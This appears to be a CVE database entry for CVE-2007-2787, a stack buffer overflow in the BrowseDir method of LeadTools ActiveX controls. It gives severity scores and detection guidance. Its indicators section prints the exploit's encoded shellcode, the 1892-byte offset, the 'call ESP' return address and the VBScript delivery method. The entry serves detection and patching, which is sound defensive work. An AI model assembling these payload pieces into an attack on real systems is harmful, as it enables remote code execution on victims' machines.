cbcvebase.
CVE-2007-2787
published 2007-05-21

CVE-2007-2787: Stack-based buffer overflow in the BrowseDir function in the (1) lttmb14E.ocx or (2) LTRTM14e.DLL ActiveX control in LeadTools Raster Thumbnail Object Library…

PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.50%
93.7th percentile
Stack-based buffer overflow in the BrowseDir function in the (1) lttmb14E.ocx or (2) LTRTM14e.DLL ActiveX control in LeadTools Raster Thumbnail Object Library 14.5.0.44 allows remote attackers to execute arbitrary code via a long argument.

Affected

1 ranges
VendorProductVersion rangeFixed in
lead_technologiesleadtools_raster_thumbnail_object_library

Detection & IOCsextracted from sources · hover to see the quote

filenamelttmb14E.ocx
filenameLTRTM14e.DLL
commandtest.BrowseDir egg
bytes
%EB%AA%3F%7E
bytes
%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a
  • The vulnerable method is BrowseDir on the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL; monitor for invocation of BrowseDir with arguments exceeding 1892 bytes, which triggers the stack-based buffer overflow.
  • The exploit uses a 1892-byte 'A' padding buffer followed by the EIP overwrite value %EB%AA%3F%7E (call ESP gadget from user32.dll); detect large string arguments to BrowseDir in browser/script contexts.
  • The exploit is delivered via a VBScript Sub invoking the ActiveX BrowseDir method with a crafted oversized egg string; look for script blocks calling .BrowseDir with large string concatenations in HTML/HTA files.
  • The exploit targets Windows XP SP2 with Internet Explorer 7; the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL should be flagged as kill-bit candidates and their presence on systems audited.
  • ·The EIP overwrite gadget (%EB%AA%3F%7E, 'call ESP') is sourced from user32.dll and is version/OS-specific; the offset of 1892 bytes and this gadget address apply specifically to Windows XP SP2 with the tested DLL version 14.5.0.44.
  • ·Both exploits (lttmb14E.ocx and LTRTM14e.DLL) use identical shellcode and buffer layout, indicating the same vulnerability surface and offset apply to both ActiveX controls at version 14.5.0.44.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.